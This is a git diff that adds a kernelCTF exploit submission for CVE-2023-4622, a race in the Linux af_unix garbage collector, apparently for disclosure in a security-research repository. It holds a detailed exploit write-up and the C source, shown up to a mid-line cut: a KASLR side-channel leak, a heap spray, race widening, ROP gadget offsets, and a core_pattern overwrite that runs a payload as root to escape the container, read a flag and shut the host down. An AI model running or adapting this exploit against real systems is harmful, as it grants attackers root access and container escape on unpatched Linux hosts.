diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/exploit.md new file mode 100644 index 00000000..e9b4729c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/exploit.md @@ -0,0 +1,465 @@ +# Exploit Tech Overview + +The vulnerability is race between unix_gc with unix_stream_sendpage. +Because `unix_stream_sendpage` grab skb without lock. It give unix_gc the chance to conccurent do operation on the sk_receive_queue. +We use timerfd to raise exception handler to extend the race windows, buy more time for unix_gc to free skb and let us cross-cache and spray. +```C +static ssize_t unix_stream_sendpage(struct socket *socket, struct page *page, + int offset, size_t size, int flags) +{ + ... + + skb = skb_peek_tail(&other->sk_receive_queue); //nolock and peek the tail skb + if (tail && tail == skb) { + skb = newskb; + } else if (!skb || !unix_skb_scm_eq(skb, &scm)) { + if (newskb) { + skb = newskb; + } else { + tail = skb; + goto alloc_skb; + } + } else if (newskb) { + /* this is fast path, we don't necessarily need to + * call to kfree_skb even though with newskb == NULL + * this - does no harm + */ + consume_skb(newskb); + newskb = NULL; + } + // timerfd expire to raise exception handler here, at same time unix_gc is doing free the skb we grabed before + if (skb_append_pagefrags(skb, page, offset, size)) { + tail = skb; + goto alloc_skb; + } +``` + +Since skb is freed before enter function `skb_append_pagefrags`. We can forge skb's contents to our control data. +Using this vulnerability, we can insert a skb_frag on an arbitrary kernel address by the following calling path +skb_append_pagefrags -> skb_fill_page_desc_noacc -> __skb_fill_page_desc_noacc. + +```C +static inline void __skb_fill_page_desc_noacc(struct skb_shared_info *shinfo, + int i, struct page *page, + int off, int size) +{ + skb_frag_t *frag = &shinfo->frags[i]; + + /* + * Propagate page pfmemalloc to the skb if we can. The problem is + * that not all callers have unique ownership of the page but rely + * on page_is_pfmemalloc doing the right thing(tm). + */ + frag->bv_page = page; + frag->bv_offset = off; + skb_frag_size_set(frag, size); +} + +``` + +According to the skb_frag_t struct layout, bv_offset is more controllable and it's value is between 0 to 0xfff. +We are interested when value is 0, because we can use choose to null first few bytes of a kernel address. +In this case, `struct msg_msg` become our target object again. +```C +typedef struct bio_vec skb_frag_t; +struct bio_vec { + struct page * bv_page; /* 0 8 */ + unsigned int bv_len; /* 8 4 */ + unsigned int bv_offset; /* 12 4 */ + + /* size: 16, cachelines: 1, members: 3 */ + /* last cacheline: 16 bytes */ +}; +``` + +Let's take a look into msg_msg struct layout and a sample memory layout of msg_msgs + +```C +struct msg_msg { + struct list_head { + struct list_head * next; /* 0 8 */ + struct list_head * prev; /* 8 8 */ + } m_list; /* 0 16 */ + long int m_type; /* 16 8 */ + /* typedef size_t -> __kernel_size_t -> __kernel_ulong_t */ long unsigned int m_ts; /* 24 8 */ + struct msg_msgseg * next; /* 32 8 */ + void * security; /* 40 8 */ + + /* size: 48, cachelines: 1, members: 5 */ + /* last cacheline: 48 bytes */ +}; +``` + +``` +0xffff8880082e2380: 0xffff888008705080 0xffff888007ebf680 //m_list.next m_list.prev +0xffff8880082e2390: 0x000000000000008b 0x0000000000000050 //m_type m_ts +0xffff8880082e23a0: 0x0000000000000000 0x0000000000000000 //next security +0xffff8880082e23b0: 0x0000000000000408 0x0000000000000000 //data +0xffff8880082e23c0: 0x0000001000000000 0x0000000000000000 +0xffff8880082e23d0: 0x0000000000000000 0x0000000000000000 +0xffff8880082e23e0: 0x0000000000000000 0x0000000000000000 +0xffff8880082e23f0: 0x0000000000000000 0x0000000000000000 +0xffff8880082e2400: 0xffff888008705f80 0xffff888007ebf800 //m_list.next m_list.prev +0xffff8880082e2410: 0x000000000000008b 0x0000000000000050 //m_type m_ts +0xffff8880082e2420: 0x0000000000000000 0x0000000000000000 //next security +0xffff8880082e2430: 0x0000000000000412 0x0000000000000000 //data +0xffff8880082e2440: 0x0000001000000000 0x0000000000000000 +0xffff8880082e2450: 0x0000000000000000 0x0000000000000000 +0xffff8880082e2460: 0x0000000000000000 0x0000000000000000 +0xffff8880082e2470: 0x0000000000000000 0x0000000000000000 +``` + +If we choose (0xffff8880082e2400+2-0x10) as our skb_frag_t, after return from function `__skb_fill_page_desc_noacc`, the above memory layout will become as follow +``` +0xffff8880082e2380: 0xffff888008705080 0xffff888007ebf680 //m_list.next m_list.prev +0xffff8880082e2390: 0x000000000000008b 0x0000000000000050 //m_type m_ts +0xffff8880082e23a0: 0x0000000000000000 0x0000000000000000 //next security +0xffff8880082e23b0: 0x0000000000000408 0x0000000000000000 //data +0xffff8880082e23c0: 0x0000001000000000 0x0000000000000000 +0xffff8880082e23d0: 0x0000000000000000 0x0000000000000000 +0xffff8880082e23e0: 0x0000000000000000 0x0000000000000000 +0xffff8880082e23f0: 0xea00001223400000 0x000000001000ffff +0xffff8880082e2400: 0xffff888008700000 0xffff888007ebf800 //m_list.next m_list.prev +0xffff8880082e2410: 0x000000000000008b 0x0000000000000050 //m_type m_ts +0xffff8880082e2420: 0x0000000000000000 0x0000000000000000 //next security +0xffff8880082e2430: 0x0000000000000412 0x0000000000000000 //data +0xffff8880082e2440: 0x0000001000000000 0x0000000000000000 +0xffff8880082e2450: 0x0000000000000000 0x0000000000000000 +0xffff8880082e2460: 0x0000000000000000 0x0000000000000000 +0xffff8880082e2470: 0x0000000000000000 0x0000000000000000 +``` + +m_list.next first two byte has been overwrite to null byte and make it point to another msg_msg. +With two msg_msg->m_list.next point to same address, we can use known exploit tech to achieve container escape. + + +# Exploit Tech Detail + +The exploit is consist in the following steps +* EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543) +* Prepare timerfd +* Spray large amount msg_msg +* Prepare refcount circle to make unix_gc free skbs +* Race between unix_gc with unix_stream_sendpage +* Reclaim SKB with pipe page buffer +* msg_msg exploit technique +* Achieve container escape. + +The most unreliable and hard to success is at `Race between unix_gc with unix_stream_sendpage`. +Because lack of the information to set timeout at right place in nanoseconds, we tried value from 200 ~ 4096. +Depend on how lucky we are we might be hit the right place within few minutes or keep fail after half hour. +To trigger vulns more easily, we recommend to patch the following code to linux kernel. + +```diff +diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c +index 5b19b6c53..3bdc0aa94 100644 +--- a/net/unix/af_unix.c ++++ b/net/unix/af_unix.c +@@ -2347,7 +2347,7 @@ static ssize_t unix_stream_sendpage(struct socket *socket, struct page *page, + consume_skb(newskb); + newskb = NULL; + } +- ++ mdelay(10); + if (skb_append_pagefrags(skb, page, offset, size)) { + tail = skb; + goto alloc_skb; +``` + + +## EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543) +This technique we used to bypass KASLR. This technique we're able to predict/guess the physmap address of the msg_msg object in kernel heap. In our exploit this technique also shown to get kernel .text address, but it will be corrected later when we get kernel .text address via pipe_buffer leak to make it more reliable. You can find the details about this technique [here](https://www.willsroot.io/2022/12/entrybleed.html). + +## Prepare timerfd +We adopt the exploit tech from `Jann's blog Racing against the clock -- hitting a tiny kernel race window` to extend the race windows +To make race windows larger on kernels without CONFIG_PREEMPT. +* make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context) +* make sure that the wakeup triggered by the timerfd has to churn through many waitqueue items created by epoll + +So function `do_epoll_enqueue` in our exploit code is to do such thing +```C +void do_epoll_enqueue(int fd) +{ + int cfd[2]; + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); + for (int k = 0; k < 0x4; k++) + { + if (fork() == 0) + { + for (int i = 0; i < 0x100; i++) + { + timefds[i] = SYSCHK(dup(fd)); + } + for (int i = 0; i < 0xc0; i++) + { + epfds[i] = SYSCHK(epoll_create(0x1)); + } + for (int i = 0; i < 0xc0; i++) + { + for (int j = 0; j < 0x100; j++) + { + // queue as many as possible async waiters at timerfd waitqueue + epoll_ctl_add(epfds[i], timefds[j], 0); + } + } + write(cfd[1], buf, 1); + raise(SIGSTOP); // stop here for nothing and just keep epoll alive + } + // sync to make sure it has queue what we need + read(cfd[0], buf, 1); + } + close(cfd[0]); + close(cfd[1]); +} +``` +## Spray large amount msg_msg +To bypass KASLR we using EntryBleed to guess msg_msg address at kernel heap physmap address. To make it more stable +we spray large amount msg_msg in kernel heap to increase probability guessed kernel address is msg_msg object. +There's total 794MB spray data, and this is enough to perform exploitation in kernelCTF instance with 4GB of RAM. +This is following code where we setup and spray kernel heap with msg_msg. + +```c +#define NUM_QUEUE_MAX 32000 +#define NUM_QUEUE_RESV 100 // reserved for exploitation +#define NUM_QUEUE (NUM_QUEUE_MAX - NUM_QUEUE_RESV) +#define NUM_MSG 204 // calculated from 16384 (max bytes in queue) / MSG_SIZE +#define CHUNK_SIZE 0x80 +#define MSG_SIZE (CHUNK_SIZE - 0x30) + +// Spray as many msg_msgs as possible to full the kernel heap memory +// For 4 GB RAM system, we spray NUM_QUEUE * NUM_MSG * CHUNK_SIZE = 794 MB msg_msg +// It's enough for us to analyze and make our choose kernel address become a msg_msg. +int setup_msg() +{ + msqid = malloc(sizeof(*msqid) * 40000); + hackq = malloc(sizeof(*msqid) * NUM_QUEUE_RESV); + printf("setup msg start..\n"); + memset(&msg.mtext[0], 0, 0x2000); + msg.mtype = 1; + system("ipcrm --all=msg"); + for (int i = 0; i < NUM_QUEUE; i++) + { + msqid[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); + SYSCHK(msqid[i]); + } + for (int i = 0; i < NUM_QUEUE_RESV; i++) + { + hackq[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); + SYSCHK(hackq[i]); + } + // Fake `struct skb_shared_info` in the data of msg_msg + // We will choose a specific kernel heap address as `skb_shinfo(skb)` + msg.mtext[0x44 - 0x30] = '\x10'; // nr_frags + for (int j = 0; j < NUM_MSG; j++) + { + for (int i = 0; i < NUM_QUEUE; i++) + { + *(size_t *)&msg.mtext[0] = i; // queue identifier stored here + msg.mtype = j + 1; // msg index identifier + SYSCHK(msgsnd(msqid[i], &msg, MSG_SIZE, IPC_NOWAIT)); + } + } + printf("setup msg done\n"); +} +``` +We spray in some defined amount of message queue and some defined amount msg_msg for each allocated message queue. +For every message we add queue identifier and message identifier that will useful in exploitation, for example +to check corrupted message queue and perform msg_msg "feng shui" in accurate and stable. +Queue identifier means queue the message is in. Msg identifier means what order the msg is in the queue. + +## Prepare refcount circle to make unix_gc free skbs +We need to make unix_gc detect a refcount circle and do garbage collection to clear selected unix_sockets' sk_receive_queue. +Init two pair unix sockets named A, B, C and D. A's unix_peer is B and C's unix_peer is D. +By send C to A to make B's sk_receive_queue hold a refcount of C. +By send B to D to make C's sk_receive_queue hold a refcount of D. +B and C become a refcount circle, and it will clear these sk_receive_queue when trigger unix_gc. + +In this step also we sending a lot of skbs to exploit use-after-free by performing cross cache attack, so we can reclaim uaf object by our own controlled data later. + +The following code snippet is to do such thing. +```C + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds)); + A = fds[0]; + B = fds[1]; + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, fds)); + C = fds[0]; + D = fds[1]; + + // Max the socket send/recv buffer, because we need to spray a certain number skb + // For heap cross cache attack + size_t val = 0x400000; + SYSCHK(SYSCHK(setsockopt(D, SOL_SOCKET, SO_SNDBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(A, SOL_SOCKET, SO_SNDBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(B, SOL_SOCKET, SO_RCVBUF, &val, 4))); + SYSCHK(SYSCHK(setsockopt(C, SOL_SOCKET, SO_RCVBUF, &val, 4))); + + // Spray a lot skb a head for heap feng shui + *(int *)CMSG_DATA(cmsg) = C; + for (int i = 0; i < 0x100; i++) + SYSCHK(sendmsg(D, &msg, 0)); + + // Make B's recv buffer hold C, datapipe and signalpipe refcount + cmsg->cmsg_len = CMSG_LEN(sizeof(int) * 3); + msg.msg_controllen = cmsg->cmsg_len; + ((int *)CMSG_DATA(cmsg))[0] = signalpipe[1]; //when release this file, spray_pipe_page_thread will wake up when CPU#1 has free cpu time. + ((int *)CMSG_DATA(cmsg))[1] = datapipe[1]; // when release this file, because pipe lock is hold in splice, it will sleep and let CPU#1 to context switch + ((int *)CMSG_DATA(cmsg))[2] = C; + SYSCHK(sendmsg(A, &msg, 0)); + + // decrease unnecessary refcount + close(signalpipe[1]); + close(datapipe[1]); + + // Make C's recv buffer hold B refcount + cmsg->cmsg_len = CMSG_LEN(sizeof(int)); + msg.msg_controllen = cmsg->cmsg_len; + *(int *)CMSG_DATA(cmsg) = B; + SYSCHK(sendmsg(D, &msg, 0)); + + // Spray a lot skb at tail for heap feng shui + *(int *)CMSG_DATA(cmsg) = C; + for (int i = 0; i < 0x100; i++) + SYSCHK(sendmsg(D, &msg, 0)); + + // decrease unnecessary refcount + close(B); + close(C); +``` + +## Race between unix_gc with unix_stream_sendpage +Init two threads to race between unix_gc with unix_stream_sendpage. + +Function `trigger_unix_stream_sendpage` in our exploit code will setup a timeout in nanosecond and use system call splice to insert a pipe page to unix_socket. +It will call unix_stream_sendpage to reach our vulnerable function. +```C +void *trigger_unix_stream_sendpage(void *x) +{ + set_cpu(0); + // setup a certain timeout nanosecond + struct itimerspec new = {.it_value.tv_nsec = timeout}; + // Send signal to trigger_unix_gc_thread + write(sync_job[1], "H", 1); + SYSCHK(timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL)); + splice(datapipe[0], 0, A, 0, 0x1000, 0); + close(datapipe[0]); + return NULL; +} + +``` +Function `trigger_unix_gc_thread` in our exploit code will trigger unix_gc by release a unused unix socket. +It will detect our prepared refcount circle and clear these sk_receive_queue. +```C +void *trigger_unix_gc_thread(void *x) +{ + set_cpu(1); + int s = socket(AF_UNIX, SOCK_STREAM, 0); + read(sync_job[0], &x, 1); + // Release a unix socket will trigger unix_gc + close(s); + return NULL; +} +``` + +## Reclaim SKB with pipe page buffer +We need to perform cross cache attack to reclaim skb with our own controlled data. This time we use [pipe page buffer](https://elixir.bootlin.com/linux/latest/source/fs/pipe.c#L498) to reclaim the skb and control the skb value. +It will performed by `spray_pipe_page_thread` in seperate thread. + +```c +void *spray_pipe_page_thread(void *x) +{ + set_cpu(1); + // After unix_gc clean skb, this thread will wakeup and start spray pipe page. + read(signalpipe[0], buf, 1); + for (int i = 0; i < 0x100; i++) + for (int j = 0; j < 0x10; j++) + write(spray_pipe[i][1], spray_data, 0x1000); + + return NULL; +} + +#define FIXED_OFFSET 0x140000000 +#define PAGE_OFFSET_BASE (LEAKED_KHEAP - FIXED_OFFSET) +#define TARGET_PHYS_ADDR 0x82e2380 +#define PHYS_ADDR_MSG (PAGE_OFFSET_BASE + TARGET_PHYS_ADDR) // guessed msg_msg address + +// spray data +int main(...) { + ... + // Prepare spray data for reallocate freed skb as pipe page data. + // Craft skb->head and skb->end to control skb_shinfo pointer + for (int i = 0; i < 0x10; i++) + { + *(size_t *)&spray_data[i * 0x100 + 0xc8] = PHYS_ADDR_MSG; // skb->head + *(size_t *)&spray_data[i * 0x100 + 0xc0] = 0x42; // skb->end + } + ... +} +``` + +## msg_msg exploit technique +This primitive let us to partially overwrite msg.m_list.next of the msg we spray with `0000`. It will make two msg_msg in different message queue +point to the same msg_msg object. +After the bug is trigerred, exploit continue to check and find if there's corrupted message in the queues. We traverse every message +in every queue to check its identifier. We retrieve j-th msg in i-th queue, then check with the identifier stored in retrieved msg object, +if it's not same then we know this msg that will act as "victim" msg, because this msg pointed by another two msg (by mlist.next) and we can +perform msg_msg "feng shui" here. + +Exploit continue to perform "feng shui" on msg_msg object. First we leak kernel heap address for prepared ROP address and pipe_buffer address at +kmalloc-1024. Then, we perform known arbitrary free on pipe_buffer technique using `msg.security` and bypass `list_del` (with CONFIG_DEBUG_LIST=y) +(https://github.com/star-sg/security-research/blob/CVE-2023-4622/pocs/linux/kernelctf/CVE-2023-3390_lts_cos_mitigation/docs/novel-techniques.md#config_debug_list-leading-to-expand-vulnerabilitys-capability). + +We overwrite pipe_buffer object with stack pivot gadget, and after we closed all the pipes it will execute stack pivot gadget and finally landed on ROP gadget that generated before. + +## Achieve container escape. + +Once we control the kernel RIP we crafted ROP to cause core_pattern being overwritten to `|/proc/%P/fd/666`: + +We then use memfd and write an executable file payload in fd 666. +```C +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) +{ + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + *(size_t *)0 = 0; +} +``` + +Later when coredump happened, it will execute our executable file as root in root namespace: +```C +*(size_t*)0=0; //trigger coredump +``` + +Executable file `root` is used to spawn shell when coredump happened. This is the code looks like: +```c++ +void* job(void* x){ + FILE* fp = popen("pidof billy","r"); + fread(buf,1,0x100,fp); + fclose(fp); + int pid = strtoull(buf,0,10); + sprintf(path,"/proc/%d/ns/net",pid); + int pfd = syscall(SYS_pidfd_open,pid,0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd,0); + dup2(stdoutfd,1); + dup2(stderrfd,2); + system("cat /flag;echo o>/proc/sysrq-trigger"); +} +int main(int argc,char** argv){ + job(0); +} +``` diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/vulnerability.md new file mode 100644 index 00000000..2832504f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/docs/vulnerability.md @@ -0,0 +1,14 @@ +- Requirements: + - Capabilites: NA + - Kernel configuration: CONFIG_UNIX=y + - User namespaces required: No +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=869e7c62486e +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-6.1.y&id=790c2f9d15b594350ae9bca7b236f2b1859de02c +- Affected Version: v4.2 - v6.4 +- Affected Component: af_unix +- Syscall to disable: splice +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4622 +- Cause: Use-After-Free +- Description: A use-after-free vulnerability in the Linux kernel's af_unix. unix_stream_sendpage() tries to add data to the last skb in the peer's +recv queue without locking the queue. So, there is a race where unix_stream_sendpage() could access an skb locklessly that is being +released by garbage collection, resulting in use-after-free. We recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/Makefile b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/Makefile new file mode 100644 index 00000000..f02edb63 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/Makefile @@ -0,0 +1,12 @@ +exploit: poc root run.sh + tar czf ./poc.tar.gz poc root + cp run.sh exploit + fallocate -l 512 exploit + dd if=poc.tar.gz of=exploit conv=notrunc oflag=append + +poc: poc.c + gcc -o poc poc.c -static -pthread +root: root.c + gcc -o root root.c -static +clean: + rm -rf poc root exploit poc.tar.gz diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/exploit b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/exploit new file mode 100755 index 00000000..2c3c3f2e Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc new file mode 100755 index 00000000..616b7225 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc differ diff --git a/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.c b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.c new file mode 100644 index 00000000..8a71d245 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4622_cos/exploit/cos-105-17412.101.42/poc.c @@ -0,0 +1,765 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SYSCHK(x) ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ +}) +char y[2]; +#define PAUSE \ + { \ + printf(":"); \ + read(0, y, 1); \ + } +size_t gettime(); +char buf[0x1000]; +int timefds[0x1000]; +int epfds[0x1000]; +size_t timeout = 200; +int fds[2]; +int A, B, C, D; +char data[0x1000]; +int sync_job[2]; +int signalpipe[2]; +int datapipe[2]; +int spray_pipe[0x100][2]; +int spray_pipe2[0x400][2]; + +int tfd; +char spray_data[0x1000]; +int *msqid; +int *hackq; + +struct +{ + long mtype; + char mtext[0x2000]; +} msg; + +#define KERNEL_LOWER_BOUND 0xffffffff80000000ull +#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull + +#define STEP_KERNEL 0x100000ull +#define SCAN_START_KERNEL KERNEL_LOWER_BOUND +#define SCAN_END_KERNEL KERNEL_UPPER_BOUND +#define ARR_SIZE_KERNEL (SCAN_END_KERNEL - SCAN_START_KERNEL) / STEP_KERNEL + +#define PHYS_LOWER_BOUND 0xffff888000000000ull +#define PHYS_UPPER_BOUND 0xfffffe0000000000ull + +#define STEP_PHYS 0x40000000ull +#define SCAN_START_PHYS PHYS_LOWER_BOUND +#define SCAN_END_PHYS PHYS_UPPER_BOUND +#define ARR_SIZE_PHYS (SCAN_END_PHYS - SCAN_START_PHYS) / STEP_PHYS + +#define DUMMY_ITERATIONS 5 +#define ITERATIONS 100 + +uint64_t kaslr; +uint64_t phys; + +// https://www.willsroot.io/2022/12/entrybleed.html +uint64_t sidechannel(uint64_t addr) +{ + uint64_t a, b, c, d; + asm volatile(".intel_syntax noprefix;" + "mfence;" + "rdtscp;" + "mov %0, rax;" + "mov %1, rdx;" + "xor rax, rax;" + "lfence;" + "prefetchnta qword ptr [%4];" + "prefetcht2 qword ptr [%4];" + "xor rax, rax;" + "lfence;" + "rdtscp;" + "mov %2, rax;" + "mov %3, rdx;" + "mfence;" + ".att_syntax;" + : "=r"(a), "=r"(b), "=r"(c), "=r"(d) + : "r"(addr) + : "rax", "rbx", "rcx", "rdx"); + a = (b << 32) | a; + c = (d << 32) | c; + return c - a; +} + +uint64_t prefetch(int phys) +{ + uint64_t arr_size = ARR_SIZE_KERNEL; + uint64_t scan_start = SCAN_START_KERNEL; + uint64_t step_size = STEP_KERNEL; + if (phys) + { + arr_size = ARR_SIZE_PHYS; + scan_start = SCAN_START_PHYS; + step_size = STEP_PHYS; + } + + uint64_t *data = malloc(arr_size * sizeof(uint64_t)); + memset(data, 0, arr_size * sizeof(uint64_t)); + + uint64_t min = ~0, addr = ~0; + + for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) + { + for (uint64_t idx = 0; idx < arr_size; idx++) + { + uint64_t test = scan_start + idx * step_size; + syscall(104); + uint64_t time = sidechannel(test); + if (i >= DUMMY_ITERATIONS) + data[idx] += time; + } + } + + for (int i = 0; i < arr_size; i++) + { + data[i] /= ITERATIONS; + if (data[i] < min) + { + min = data[i]; + addr = scan_start + i * step_size; + } + } + + free(data); + + return addr; +} + +size_t KERNEL_BASE = 0xffffffff81000000; +size_t LEAKED_KHEAP = 0xffff888140000000; + +// simple most frequent value in array algorithm +size_t mostFrequent(size_t *arr, size_t n) +{ + // code here + size_t maxcount = 0; + size_t element_having_max_freq; + for (int i = 0; i < n; i++) + { + size_t Count = 0; + for (int j = 0; j < n; j++) + { + if (arr[i] == arr[j]) + Count++; + } + + if (Count > maxcount) + { + maxcount = Count; + element_having_max_freq = arr[i]; + } + } + + return element_having_max_freq; +} +// Since there no KPTI on the remote server (as its CPU is not affected by Meltdown, so the kernel does not turn on KPTI) +// so this is actually prefetch attack. ref: https://gruss.cc/files/prefetch.pdf +void leak() +{ + size_t kbase[0x8] = {0}; + size_t kheap[0x8] = {0}; + for (int i = 0; i < 0x8; i++) + { + kbase[i] = prefetch(0) - 0x1600000; + kheap[i] = prefetch(1); + printf("0x%lx 0x%lx\n", kbase[i], kheap[i]); + } + KERNEL_BASE = mostFrequent(kbase, 8); + LEAKED_KHEAP = mostFrequent(kheap, 8); + printf("choose 0x%lx 0x%lx\n", KERNEL_BASE, LEAKED_KHEAP); +} + +#define FIXED_OFFSET 0x140000000 +#define PAGE_OFFSET_BASE (LEAKED_KHEAP - FIXED_OFFSET) // physmap base of physical address 0x0 +#define TARGET_PHYS_ADDR 0x82e2380 // high probability addr we found msg_msg after spray 794MB msg +#define PHYS_ADDR_MSG (PAGE_OFFSET_BASE + TARGET_PHYS_ADDR) + +#define NUM_QUEUE_MAX 32000 +#define NUM_QUEUE_RESV 100 // reserved for exploitation +#define NUM_QUEUE (NUM_QUEUE_MAX - NUM_QUEUE_RESV) +#define NUM_MSG 204 +#define CHUNK_SIZE 0x80 +#define MSG_SIZE (CHUNK_SIZE - 0x30) + +// Spray as many msg_msgs as possible to full the kernel heap memory +// For 4 GB RAM system, we spray NUM_QUEUE * NUM_MSG * CHUNK_SIZE = 794 MB msg_msg +// It's enough for us to analyze and make our choose kernel address become a msg_msg. +int setup_msg() +{ + msqid = malloc(sizeof(*msqid) * 40000); + hackq = malloc(sizeof(*msqid) * NUM_QUEUE_RESV); + printf("setup msg start..\n"); + memset(&msg.mtext[0], 0, 0x2000); + msg.mtype = 1; + // Removes all of the current user's previously allocated msg_msg structs to aviod reach limits. + system("ipcrm --all=msg"); + for (int i = 0; i < NUM_QUEUE; i++) + { + msqid[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); + SYSCHK(msqid[i]); + } + for (int i = 0; i < NUM_QUEUE_RESV; i++) + { + hackq[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); + SYSCHK(hackq[i]); + } + // Fake `struct skb_shared_info` in the data of msg_msg + // We will choose a specific kernel heap address as `skb_shinfo(skb)` + msg.mtext[0x44 - 0x30] = '\x10'; // nr_frags + for (int j = 0; j < NUM_MSG; j++) + { + for (int i = 0; i < NUM_QUEUE; i++) + { + *(size_t *)&msg.mtext[0] = i; // queue identifier stored here + msg.mtype = j + 1; // msg index identifier + SYSCHK(msgsnd(msqid[i], &msg, MSG_SIZE, IPC_NOWAIT)); + } + } + printf("setup msg done\n"); +} + +#ifdef LTS +#define START_ROP 0x50 +#define STATIC_KBASE 0xffffffff81000000 +#define POP_RDI (KERNEL_BASE + (0xffffffff8112cfc0 - STATIC_KBASE)) // pop rdi ; ret +#define POP_RSI (KERNEL_BASE + (0xffffffff81064c7e - STATIC_KBASE)) // pop rsi ; ret +#define POP_RSI2 (KERNEL_BASE + (0xffffffff811ea35e - STATIC_KBASE)) // pop rsi ; mov eax, xxx ; ret +#define POP_RDX (KERNEL_BASE + (0xffffffff810bf3d2 - STATIC_KBASE)) // pop rdx ; ret +#define POP_RSP (KERNEL_BASE + (0xffffffff81027924 - STATIC_KBASE)) // pop rsp ; ret +#define PIVOT (KERNEL_BASE + (0xffffffff8198954b - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x39] +#define PIVOT2 (KERNEL_BASE + (0xffffffff8112cfbe - STATIC_KBASE)) // pop rsp ; pop r15 ; ret +#define PIVOT3 (KERNEL_BASE + (0xffffffff81c53eb4 - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x2e] +#define CORE_PATTERN (KERNEL_BASE + (0xffffffff837ba460 - STATIC_KBASE)) +#define COPY_FROM_USER (KERNEL_BASE + (0xffffffff8186e280 - STATIC_KBASE)) +#define MSLEEP (KERNEL_BASE + (0xffffffff812292e0 - STATIC_KBASE)) +#define ANON_PIPE_BUF_OPS_OFF (0xffffffff82a1cf80 - STATIC_KBASE) +#else +#define START_ROP 0x50 +#define STATIC_KBASE 0 +#define POP_RDI (KERNEL_BASE + (0x012001cc - STATIC_KBASE)) // pop rdi ; ret +#define POP_RSI (KERNEL_BASE + (0x00fd4d75 - STATIC_KBASE)) // pop rsi ; ret +#define POP_RSI2 (KERNEL_BASE + (0x00fd4d75 - STATIC_KBASE)) // pop rsi ; mov eax, xxx ; ret +#define POP_RDX (KERNEL_BASE + (0x00fc7352 - STATIC_KBASE)) // pop rdx ; ret +#define POP_RSP (KERNEL_BASE + (0x00fd3ea6 - STATIC_KBASE)) // pop rsp ; ret +#define PIVOT (KERNEL_BASE + (0x008a9428 - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x39] +#define PIVOT2 (KERNEL_BASE + (0x0008160e - STATIC_KBASE)) // pop rsp ; pop r15 ; ret +#define PIVOT3 (KERNEL_BASE + (0 - STATIC_KBASE)) // push rsi ; jmp qword ptr [rsi + 0x2e] +#define CORE_PATTERN (KERNEL_BASE + (0x239e4a0 - STATIC_KBASE)) +#define COPY_FROM_USER (KERNEL_BASE + (0x7855f0 - STATIC_KBASE)) +#define MSLEEP (KERNEL_BASE + (0x16c1c0 - STATIC_KBASE)) +#define ANON_PIPE_BUF_OPS_OFF (0x17cae40 - STATIC_KBASE) +#endif + +char user_buf[] = "|/proc/%P/fd/666"; +#define ROP(idx) ((size_t *)rop)[(idx) + (START_ROP / 8)] +int 